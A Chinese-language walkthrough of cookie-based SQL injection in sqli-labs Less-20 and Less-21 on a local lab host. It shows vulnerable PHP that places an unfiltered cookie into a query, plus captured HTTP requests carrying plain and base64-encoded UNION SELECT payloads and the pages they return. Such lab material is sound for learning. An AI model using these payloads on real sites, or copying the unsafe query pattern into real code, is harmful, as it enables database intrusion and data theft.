对于cookie的注入,很多人都不会陌生,cookie实际和Get还有Post并没有太大的区别,合并为三大危险的GPC注入,只不过是参数的提交方式不同,我们直接看下源码,从获取到进入数据库的阶段
****************这次直接讲长点**********
if(isset($_POST['uname']) && isset($_POST['passwd'])) { $uname = check_input($_POST['uname']); $passwd = check_input($_POST['passwd']); $sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1"; $result1 = mysql_query($sql); $row1 = mysql_fetch_array($result1); $cookee = $row1['username'];
我们看下渗入点,也就是Post传递的参数,代码首先去判断uname和passwd的值是否为空,不为空的话进入到下一阶段,讲两个参数传递到check_input()中,然后就直接传入了构造的SQL语句中,我们顺着去看看check_input()的构造
function check_input($value) { if(!empty($value)) { $value = substr($value,0,20); // truncation (see comments) } if (get_magic_quotes_gpc()) // Stripslashes if magic quotes enabled { $value = stripslashes($value); } if (!ctype_digit($value)) // Quote if not a number { $value = "'" . mysql_real_escape_string($value) . "'"; } else { $value = intval($value); } return $value; }
Check_input是自己创建的一个安全函数,对uname和passwd进行了各种过滤,(当作绝对安全吧)
这样的话,我们再寻找其他的渗入点
if(!isset($_POST['submit'])) { $cookee = $_COOKIE['uname']; $sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";
可以看到还有个渗入点在cookie这,获得了cookie的参数,直接传入了SQL语句中,中间并没有过滤,那我们就可以对其进行注入
Cookie的注入可以通过网上的教程,也就是Js代码构造进行注入,还有一种就是中转注入,把cookie当作get注入,这个的话有专门的中转工具,但是我也懒得找了,直接用Burpsuite吧
抓包
GET /sql/Less-20/index.php HTTP/1.1
Host: 192.168.150.129
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.150.129/sql/Less-20/
Cookie: uname=admin
Connection: keep-alive
Cache-Control: max-age=0
然后更改cookie的值
Cookie: uname=admin' and 1=2 union select 1,2,3#
看下返回的页面
有三个返回值剩下的就按照正常的注入就行了
<center><br><br><br><img src="../images/Less-20.jpg" /><br><br><b><br><font color= "red" font size="4">YOUR USER AGENT IS : Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0</font><br><font color= "cyan" font size="4">YOUR IP ADDRESS IS : 192.168.150.1</font><br><font color= "#FFFF00" font size = 4 >DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIRE <br><font color= "orange" font size = 5 >YOUR COOKIE : uname = admin' and 1=2 union select 1,user(),3# and expires: Sun 17 May 2015 - 14:09:57<br></font><font color= "pink" font size="5">Your Login name:root@localhost<br><font color= "grey" font size="5">Your Password:3</font></b><br>Your ID:1<center><form action="" method="post"><input type="submit" name="submit" value="Delete Your Cookie!" /></form></center><br><br><br><br> </body> </html>
当然,cookie还会遇到很多情况,因为cookie有可能会经过加密,比如说base64,那么我们在构造的时候还要把加密前和加密后的语句考虑进去
GET /sql/Less-21/ HTTP/1.1 Host: 192.168.150.129 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: uname=YWRtaW4%3D Connection: keep-alive Cache-Control: max-age=0
这是抓到的包
我们看下cookie的值是
YWRtaW4=
Base64的加密,我们解密看看是
Admin
那么cookie的传递中间应该会经历过加解密的步骤
setcookie('uname', base64_encode($row1['username']), time()+3600);
要对cookie进行解密,然后才传入SQL中,那么我们的注入语句也要相应加密
GET /sql/Less-21/ HTTP/1.1 Host: 192.168.150.129 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: uname=YWRtaW4nKWFuZCAxPTIgdW5pb24gc2VsZWN0IDEsMiwzIw== Connection: keep-alive Cache-Control: max-age=0
返回的页面参数是
<center><br><br><br><b><img src="../images/Less-21.jpg" /><br><br><b><br><font color= "red" font size="4">YOUR USER AGENT IS : Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0</font><br><font color= "cyan" font size="4">YOUR IP ADDRESS IS : 192.168.150.1</font><br><font color= "#FFFF00" font size = 4 >DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIRE <br><font color= "orange" font size = 5 >YOUR COOKIE : uname = YWRtaW4nKWFuZCAxPTIgdW5pb24gc2VsZWN0IDEsMiwzIw== and expires: Sun 17 May 2015 - 14:16:28<br></font><font color= "pink" font size="5">Your Login name:2<br><font color= "grey" font size="5">Your Password:3</font></b><br>Your ID:1<center><form action="" method="post"><input type="submit" name="submit" value="Delete Your Cookie!" /></form></center><br><br><br><br>
对于cookie的注入暂时就到这,后面还有各种花式注入,慢慢学吧